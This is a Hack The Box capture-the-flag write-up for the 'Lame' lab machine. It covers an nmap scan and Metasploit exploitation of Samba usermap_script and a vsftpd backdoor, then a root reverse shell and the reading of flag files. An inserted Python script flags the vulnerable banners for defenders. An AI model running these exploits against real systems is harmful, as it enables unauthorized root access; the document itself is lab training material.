Lame (HACKTHEBOX)

Method 1:

root@kali:~/Downloads# nmap -A 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-01 18:32 EST
Nmap scan report for 10.10.10.3
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|broadband router|remote management|printer|general purpose|specialized
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Arris embedded (92%), Control4 embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Citrix XenServer 5.X (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.4.30 cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:citrix:xenserver:5.5
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), Control4 HC-300 home controller (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.27 - 2.6.28 (92%), Linux 2.6.8 - 2.6.30 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d22h04m02s, deviation: 0s, median: -2d22h04m02s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2018-12-29T15:28:52-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   143.52 ms 10.10.14.1
2   144.34 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.51 seconds

Open ports: 21, 22, 139, 445

Next, in a browser, search for "Samba smbd 3.x exploit". The results point to the Metasploit usermap_script module, which is used below.
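As an added example that is not part of the original writeup, the following Python script parses the port table from the nmap scan above and flags the two legacy banners this box exposes, mapping each to the Metasploit module the writeup runs against it, so a defender can spot the same services in their own scan results. The sample input is constructed from the scan lines shown above, and the WATCHLIST is an assumed starting point to extend for your own environment.

```python
import re

# Constructed sample input: the port table lines from the nmap -A scan above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Assumed watchlist: version banners known to be exploitable, mapped to the
# Metasploit module the writeup runs against each one. Extend for your estate.
WATCHLIST = [
    (re.compile(r"vsftpd 2\.3\.4\b"), "exploit/unix/ftp/vsftpd_234_backdoor"),
    (re.compile(r"Samba smbd 3\.0\.20\b"), "exploit/multi/samba/usermap_script"),
]

# One nmap port-table row: "<port>/<proto> <state> <service> <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return (port, state, service, version) tuples from nmap's port table."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, _proto, state, service, version = m.groups()
            ports.append((int(port), state, service, version.strip()))
    return ports


def triage(text):
    """Flag open services whose banner is on the watchlist, plus anonymous FTP."""
    findings = []
    for port, state, _service, version in parse_ports(text):
        if state != "open":
            continue
        for pattern, module in WATCHLIST:
            if pattern.search(version):
                findings.append((port, version, module))
    # The ftp-anon script result is a separate misconfiguration worth reporting.
    if "Anonymous FTP login allowed" in text:
        findings.append((21, "ftp-anon", "anonymous login enabled"))
    return findings


if __name__ == "__main__":
    for port, banner, note in triage(NMAP_OUTPUT):
        print(f"{port}/tcp  {banner}  ->  {note}")
```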

msf > use exploit/multi/samba/usermap_script

msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3

msf exploit(multi/samba/usermap_script) > exploit

msf exploit(multi/samba/usermap_script) > sessions -u 1

meterpreter > cd /home

meterpreter > ls

meterpreter > cd makis

meterpreter > ls

meterpreter > cat user.txt

meterpreter > cd /root

meterpreter > ls

meterpreter > cat root.txt

================================================================

Method 2:

msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf auxiliary(scanner/smb/pipe_auditor) > RUN
[-] Unknown command: RUN.
msf auxiliary(scanner/smb/pipe_auditor) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.10.3                                                      yes       The target address range or CIDR identifier
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/pipe_auditor) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.11:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gNFGEeM3hzxVTibV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gNFGEeM3hzxVTibV\r\n"
[*] Matching…
[*] A is input...
[*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.3:47167) at 2018-12-20 11:22:31 -0500

pwd
/
whoami
root
cd /root
cat root.txt
92caac3be140efXXXXXXXXXXXXXXXXXXXX
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cd Desktop
ls
pwd
/root/Desktop
cd ..
ls -lrt
total 16
drwxr-xr-x 2 root root 4096 May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw------- 1 root root   33 Mar 14  2017 root.txt
-rw-r--r-- 1 root root  118 Dec 13 17:55 vnc.log
pwd
/root
cd ..
ls -lrt
total 89
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
drwxr-xr-x  15 root root  4096 May 20  2012 var
drwxr-xr-x   6 root root  4096 Mar 14  2017 home
dr-xr-xr-x 117 root root     0 Dec 13 17:54 proc
drwxr-xr-x  12 root root     0 Dec 13 17:54 sys
drwxr-xr-x  13 root root 13560 Dec 13 17:55 dev
drwxr-xr-x  95 root root  4096 Dec 13 17:55 etc
drwxr-xr-x  13 root root  4096 Dec 13 17:55 root
-rw-------   1 root root 14473 Dec 13 17:55 nohup.out
drwxrwxrwt   6 root root  4096 Dec 17 08:25 tmp
cd home
ls -lrt
total 16
drwxr-xr-x 2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x 2 service service 4096 Apr 16  2010 service
drwxr-xr-x 3 1001    1001    4096 May  7  2010 user
drwxr-xr-x 4 makis   makis   4096 Dec 14 06:25 makis
cd user
ls -lrt
total 0
cd ..
cd makis
ls -lrt
total 4
-rw-r--r-- 1 makis makis 33 Mar 14  2017 user.txt
cat user.txt
69454a937d94f5fXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT
